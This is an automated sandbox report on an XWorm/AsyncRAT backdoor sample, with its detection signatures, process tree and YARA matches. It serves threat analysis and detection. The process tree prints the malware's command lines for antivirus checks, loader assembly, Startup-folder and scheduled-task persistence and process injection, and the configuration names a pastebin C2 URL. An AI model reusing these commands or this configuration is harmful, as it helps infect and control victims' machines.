Edit tour

Windows Analysis Report
SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
Analysis ID:	1417469
MD5:	63b3dd980ac9a06fd167b0df8121c979
SHA1:	eb2737c8940e03d64c8b6e3ff59db07a1a1ec4a0
SHA256:	44d97e36a72d87c6b928ccc6ec05a80672bcbf65fc357e0e4ac20ecdd11e837e
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Contains functionality to log keystrokes (.Net Source)

Drops PE files with a suspicious file extension

Injects a PE file into a foreign processes

Sample uses string decryption to hide its real strings

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file does not import any functions

PE file overlay found

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Tries to load missing DLLs

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe (PID: 3720 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe" MD5: 63B3DD980AC9A06FD167B0DF8121C979)

cmd.exe (PID: 6580 cmdline: "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5096 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5428 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 3640 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5608 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5652 cmdline: cmd /c md 23855 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 6332 cmdline: cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 2104 cmdline: cmd /c copy /b Stream + Keyboard 23855\R MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Telecom.pif (PID: 6936 cmdline: 23855\Telecom.pif 23855\R MD5: 62D09F076E6E0240548C2F837536A46A)

cmd.exe (PID: 5396 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2008 cmdline: cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5868 cmdline: schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F MD5: 48C2FE20575769DE916F48EF0676A965)

RegAsm.exe (PID: 2056 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 1180 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 2260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068 MD5: C31336C1EFC2CCB44B4326EA793040F2)

PING.EXE (PID: 6188 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)

MpCmdRun.exe (PID: 5192 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)

conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 6772 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

EcoScape.pif (PID: 6444 cmdline: "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" MD5: 62D09F076E6E0240548C2F837536A46A)

wscript.exe (PID: 2232 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

EcoScape.pif (PID: 1652 cmdline: "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" MD5: 62D09F076E6E0240548C2F837536A46A)

wscript.exe (PID: 5112 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

EcoScape.pif (PID: 5580 cmdline: "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A" MD5: 62D09F076E6E0240548C2F837536A46A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": "https://pastebin.com/raw/Dh8E7H3R", "Aes key": "<123456789>", "Install file": "USB.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x75c9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x105d1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7666:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1066e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x777b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10783:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7277:$cnc4: POST / HTTP/1.1 0x1027f:$cnc4: POST / HTTP/1.1
0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e29:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6ec6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6fdb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6ad7:$cnc4: POST / HTTP/1.1
0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c71:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d0e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e23:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x691f:$cnc4: POST / HTTP/1.1
0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7e19:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10e21:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7eb6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10ebe:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7fcb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10fd3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7ac7:$cnc4: POST / HTTP/1.1 0x10acf:$cnc4: POST / HTTP/1.1
0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc4f9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc596:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc6ab:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc1a7:$cnc4: POST / HTTP/1.1
00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x77a1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x783e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7953:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x744f:$cnc4: POST / HTTP/1.1
0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x75d9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7676:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x778b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7287:$cnc4: POST / HTTP/1.1
0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x84b9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8556:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x866b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8167:$cnc4: POST / HTTP/1.1
0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e01:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x145c9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1d5d1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6e9e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14666:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1d66e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6fb3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1477b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1d783:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6aaf:$cnc4: POST / HTTP/1.1 0x14277:$cnc4: POST / HTTP/1.1 0x1d27f:$cnc4: POST / HTTP/1.1
0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1de01:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2b5c9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x345d1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3d3d9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x45939:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4de99:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1de9e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2b666:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3466e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3d476:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x459d6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4df36:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1dfb3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2b77b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x34783:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3d58b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x45aeb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4e04b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1daaf:$cnc4: POST / HTTP/1.1 0x2b277:$cnc4: POST / HTTP/1.1 0x3427f:$cnc4: POST / HTTP/1.1
Process Memory Space: Telecom.pif PID: 6936	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RegAsm.exe PID: 1180	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.3.Telecom.pif.4552c30.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.3.Telecom.pif.4552c30.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5ba1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5c3e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5d53:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x584f:$cnc4: POST / HTTP/1.1
11.3.Telecom.pif.4552c30.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.3.Telecom.pif.4552c30.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x79a1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7a3e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7b53:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x764f:$cnc4: POST / HTTP/1.1
11.3.Telecom.pif.3ae5b58.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.3.Telecom.pif.3ae5b58.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x79a1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7a3e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7b53:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x764f:$cnc4: POST / HTTP/1.1
11.2.Telecom.pif.4552c30.4.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.Telecom.pif.4552c30.4.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x79a1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x107a9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x18d09:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x21269:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7a3e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10846:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x18da6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x21306:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7b53:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1095b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x18ebb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2141b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x764f:$cnc4: POST / HTTP/1.1 0x10457:$cnc4: POST / HTTP/1.1 0x189b7:$cnc4: POST / HTTP/1.1 0x20f17:$cnc4: POST / HTTP/1.1
34.2.RegAsm.exe.e30000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
34.2.RegAsm.exe.e30000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x79a1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7a3e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7b53:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x764f:$cnc4: POST / HTTP/1.1
11.3.Telecom.pif.4552c30.3.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.3.Telecom.pif.4552c30.3.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5ba1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5c3e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5d53:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x584f:$cnc4: POST / HTTP/1.1
11.3.Telecom.pif.454d480.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
